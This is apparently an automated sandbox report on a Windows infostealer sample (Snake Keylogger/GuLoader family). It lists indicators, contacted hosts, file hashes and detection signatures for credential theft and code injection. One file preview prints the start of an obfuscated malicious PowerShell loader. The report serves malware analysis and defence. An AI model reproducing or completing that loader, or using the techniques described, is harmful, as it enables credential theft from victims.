          DCSync1
          System Network Configuration Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587628 Sample: ln5S7fIBkY.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 34 reallyfreegeoip.org 2->34 36 drive.usercontent.google.com 2->36 38 3 other IPs or domains 2->38 44 Found malware configuration 2->44 46 Antivirus detection for dropped file 2->46 48 Antivirus / Scanner detection for submitted sample 2->48 52 5 other signatures 2->52 8 ln5S7fIBkY.exe 3 22 2->8         started        signatures3 50 Tries to detect the country of the analysis system (by using the IP) 34->50 process4 file5 22 C:\Users\user\AppData\Local\...\Sharpness.Kon, ASCII 8->22 dropped 54 Suspicious powershell command line found 8->54 12 powershell.exe 26 8->12         started        signatures6 process7 file8 24 C:\Users\user\AppData\...\ln5S7fIBkY.exe, PE32 12->24 dropped 26 C:\Users\...\ln5S7fIBkY.exe:Zone.Identifier, ASCII 12->26 dropped 56 Early bird code injection technique detected 12->56 58 Writes to foreign memory regions 12->58 60 Found suspicious powershell code related to unpacking or dynamic code loading 12->60 62 3 other signatures 12->62 16 msiexec.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 28 checkip.dyndns.com 193.122.6.168, 49897, 49921, 49927 ORACLE-BMC-31898US United States 16->28 30 drive.usercontent.google.com 142.250.181.225, 443, 49871 GOOGLEUS United States 16->30 32 2 other IPs or domains 16->32 40 Tries to steal Mail credentials (via file / registry access) 16->40 42 Tries to harvest and steal browser information (history, passwords, etc) 16->42 signatures12

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          ln5S7fIBkY.exe68%VirustotalBrowse
          ln5S7fIBkY.exe62%ReversingLabsWin32.Spyware.Snakekeylogger
          ln5S7fIBkY.exe100%AviraTR/Injector.ekjwr
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exe100%AviraTR/Injector.ekjwr
          C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exe62%ReversingLabsWin32.Spyware.Snakekeylogger
          C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exe68%VirustotalBrowse
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          drive.google.com
          172.217.16.206
          truefalse
            high
            drive.usercontent.google.com
            142.250.181.225
            truefalse
              high
              reallyfreegeoip.org
              104.21.112.1
              truefalse
                high
                checkip.dyndns.com
                193.122.6.168
                truefalse
                  high
                  checkip.dyndns.org
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    http://checkip.dyndns.org/false
                      high
                      https://reallyfreegeoip.org/xml/8.46.123.189false
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.google.commsiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2337899026.00000000054F5000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2337899026.00000000053A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2337899026.00000000054F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://drive.google.com/msiexec.exe, 00000007.00000002.2760493798.0000000008E0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://drive.google.com/3msiexec.exe, 00000007.00000002.2760493798.0000000008E0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/powershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/Licensepowershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://reallyfreegeoip.org/xml/8.46.123.189$msiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://reallyfreegeoip.orgmsiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000246C2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://reallyfreegeoip.orgmsiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.orgmsiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.000000002469E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024774000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://apis.google.commsiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://checkip.dyndns.commsiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://nsis.sf.net/NSIS_ErrorErrorln5S7fIBkY.exe, 00000000.00000000.1510063030.000000000040A000.00000008.00000001.01000000.00000003.sdmp, ln5S7fIBkY.exe, 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2337899026.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000245F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2337899026.00000000054F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  104.21.112.1
                                                                  reallyfreegeoip.orgUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  142.250.181.225
                                                                  drive.usercontent.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  172.217.16.206
                                                                  drive.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  193.122.6.168
                                                                  checkip.dyndns.comUnited States
                                                                  31898ORACLE-BMC-31898USfalse
                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1587628
                                                                  Start date and time:2025-01-10 15:59:51 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 7m 55s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:10
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:ln5S7fIBkY.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@6/12@4/4
                                                                  EGA Information:
                                                                  • Successful, ratio: 66.7%
                                                                  HCA Information:
                                                                  • Successful, ratio: 97%
                                                                  • Number of executed functions: 142
                                                                  • Number of non-executed functions: 69
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target powershell.exe, PID 3348 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  TimeTypeDescription
                                                                  10:01:01API Interceptor35x Sleep call for process: powershell.exe modified
                                                                  10:02:45API Interceptor176x Sleep call for process: msiexec.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  104.21.112.1QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                  • www.buyspeechst.shop/w98i/
                                                                  wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  • 838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
                                                                  SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                  • beammp.com/phpmyadmin/
                                                                  193.122.6.168IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  Payment 01.08.25.pdf.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • checkip.dyndns.org/
                                                                  December Reconciliation QuanKang.exeGet hashmaliciousUnknownBrowse
                                                                  • checkip.dyndns.org/
                                                                  PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • checkip.dyndns.org/
                                                                  Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  checkip.dyndns.comB3aqD8srjF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 132.226.247.73
                                                                  VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 193.122.130.0
                                                                  bd9Gvqt6AK.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  Salary Payment Information Discrepancy_pdf.pif.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 193.122.130.0
                                                                  PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 158.101.44.242
                                                                  IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 193.122.6.168
                                                                  RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 193.122.130.0
                                                                  PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                  • 158.101.44.242
                                                                  reallyfreegeoip.orgB3aqD8srjF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.48.1
                                                                  B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.32.1
                                                                  VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.80.1
                                                                  bd9Gvqt6AK.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.80.1
                                                                  Salary Payment Information Discrepancy_pdf.pif.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 104.21.48.1
                                                                  PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.96.1
                                                                  IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.64.1
                                                                  RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.48.1
                                                                  Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.32.1
                                                                  PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                  • 104.21.80.1
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  ORACLE-BMC-31898USB3aqD8srjF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 193.122.130.0
                                                                  bd9Gvqt6AK.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  Salary Payment Information Discrepancy_pdf.pif.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 193.122.130.0
                                                                  PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 158.101.44.242
                                                                  IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 193.122.6.168
                                                                  RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 193.122.130.0
                                                                  PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                  • 158.101.44.242
                                                                  SOA NOV. Gateway Freight_MEDWA0577842.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 193.122.130.0
                                                                  CLOUDFLARENETUShttps://booking.extrantelabelason.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                  • 104.18.86.42
                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                  • 1.1.1.1
                                                                  https://eu.boxif.xyzGet hashmaliciousUnknownBrowse
                                                                  • 1.1.1.1
                                                                  7DpzcPcsTS.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 172.67.74.152
                                                                  B8FnDUj8hy.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 104.26.13.205
                                                                  B3aqD8srjF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.48.1
                                                                  FSRHC6mB16.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 172.67.74.152
                                                                  9pIm5d0rsW.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                  • 104.26.13.205
                                                                  B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.32.1
                                                                  VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.80.1
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  54328bd36c14bd82ddaa0c04b25ed9adB3aqD8srjF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.112.1
                                                                  B7N48hmO78.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.112.1
                                                                  VIAmJUhQ54.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.112.1
                                                                  bd9Gvqt6AK.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.112.1
                                                                  Salary Payment Information Discrepancy_pdf.pif.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 104.21.112.1
                                                                  PO#17971.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.112.1
                                                                  IMG_10503677.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.112.1
                                                                  RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.112.1
                                                                  Tepe - 20000000826476479.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.112.1
                                                                  PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                  • 104.21.112.1
                                                                  37f463bf4616ecd445d4a1937da06e19SvmL9tW29w.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 172.217.16.206
                                                                  • 142.250.181.225
                                                                  Osb7hkGfAb.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 172.217.16.206
                                                                  • 142.250.181.225
                                                                  fTSt7dc60O.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 172.217.16.206
                                                                  • 142.250.181.225
                                                                  vq6jxdGvD6.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 172.217.16.206
                                                                  • 142.250.181.225
                                                                  Ub46mg9pn4.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 172.217.16.206
                                                                  • 142.250.181.225
                                                                  fTSt7dc60O.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 172.217.16.206
                                                                  • 142.250.181.225
                                                                  nRNzqQOQwk.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 172.217.16.206
                                                                  • 142.250.181.225
                                                                  You7ynHizy.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 172.217.16.206
                                                                  • 142.250.181.225
                                                                  Xjz8dblHDe.exeGet hashmaliciousGuLoaderBrowse
                                                                  • 172.217.16.206
                                                                  • 142.250.181.225
                                                                  zrNcqxZRSM.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                  • 172.217.16.206
                                                                  • 142.250.181.225
                                                                  No context
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):14744
                                                                  Entropy (8bit):4.992175361088568
                                                                  Encrypted:false
                                                                  SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                                  MD5:A35685B2B980F4BD3C6FD278EA661412
                                                                  SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                                  SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                                  SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Users\user\Desktop\ln5S7fIBkY.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):478461
                                                                  Entropy (8bit):1.2475162534380173
                                                                  Encrypted:false
                                                                  SSDEEP:1536:R/xRunV7hsXgfAfBz7Wr/dIoM1mI/hqrJPNOeam:1SV7bYfp7QIT41N2
                                                                  MD5:BF4A008DC0B6586BA5DC8205FFC7DF72
                                                                  SHA1:0D84F9EF7D25DAB9667BEA1FCD6892621B5BD404
                                                                  SHA-256:497253D655FA9BDCDF3058A1092EA37C5954FB532ED86F04DE1C7121784D1EA7
                                                                  SHA-512:71EDACB5E8E860D1D936F152C20609DEAD0E9F388099F2DD33D41DDBF2EA1AFB58A2C6BFFC484C2DF7565AF9C294F2C0D2F86AAA4740F19FDE1FE8A8B821F78B
                                                                  Malicious:false
                                                                  Preview:.._.`...............................................i.........................................`.........f...................Q................................M.....r..............^....................................4......................................................................O...=.h.........................q..X...............S........................|..........................................................................................................r.).....................a......................W...................X...........................................................M.. ...............3...........<....y........x....I..............................I~..................o..........................................@..........................................D..............................................................Q.....................................................c.......i.......................................................................)...............,...
                                                                  Process:C:\Users\user\Desktop\ln5S7fIBkY.exe
                                                                  File Type:ASCII text, with very long lines (3095), with CRLF, LF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):55350
                                                                  Entropy (8bit):5.34032857083146
                                                                  Encrypted:false
                                                                  SSDEEP:768:13Zs6XOqDlTXziiIlncM1oM1XgGZstyjmPcWCqqGKmafPMrV4yIAXBMWWYUGrY1b:1K69DF+lcM1tZaGK/QNAxIQsb
                                                                  MD5:A455A44AA414354FE74EE543BBF64451
                                                                  SHA1:4D73664950E0B77B2F05EEBCE4E5C3D549CC18EA
                                                                  SHA-256:C7DAC58DCAD45ABF34BEE7C7567A746FADA583C0E734D204ED2F71617C4B7B31
                                                                  SHA-512:A9BEDCAA864985C0EC2F9EB521983D23F7B58689922F39305D17FA39AA41EF02BE8BEC3FC99D22CABA1C34C56D6D68160F9DEA27BC207EDA83F97CC47F852FA7
                                                                  Malicious:true
                                                                  Preview:$Spaantag=$Circularization;..<#stemmeridse Strafvrdighed Scotty Lunchers Dysgenics Unselling #>..<#Unrelaxing Stabels Pyoses Newmarket Benzofuryl Amorosity #>..<#Annotators Enekamret Reafflict #>..<#Rejselotteri prinse Diatomaceae #>..<#Skolerne Carphosiderite Tordentalers Kargoens Fierasferoid #>..<#Eurovisionerne Nondynastic Entices Bethumb Antrffendes #>...$Schizophytic = @'.Terga.E erg$ UvitCPeripo LseptDagcetOb.kuiVelbeeProjer.irlai DehysAnl.sm,emin=herd,$ FunkPTwittaVgterrTykn aAlboct Re.eaTar.ngTrickmKagleeGreen;invio.Pibenfforryuja.kwnSor ecBestitDystriSigjnoGulddnAblaz Re.reROut.ee taraRefrecBayercImi euG otts Sh teUnscodFasts Unent(Nim i$SkitsURuffinhemiom ypisuBushwsStruniInjurcLand aInsurlCaj,liKolletT,ymayKrubu,Magne$B.dduRBeteleHeliocB visa RaadnAnsv d Culmi TeledOu,draScripc egnbyForbi)Gravs Past.{Re nd. Ungd.Nonco$bristc KarboSovehsYeasktZoehooResouvf rtrePara,rAntimtHalere refibIn virObseraEffekl abor Troch(DrueaABustls Repsd Begra Rugel Inde Korne'BarfoVtje,ea ogboa
                                                                  Process:C:\Users\user\Desktop\ln5S7fIBkY.exe
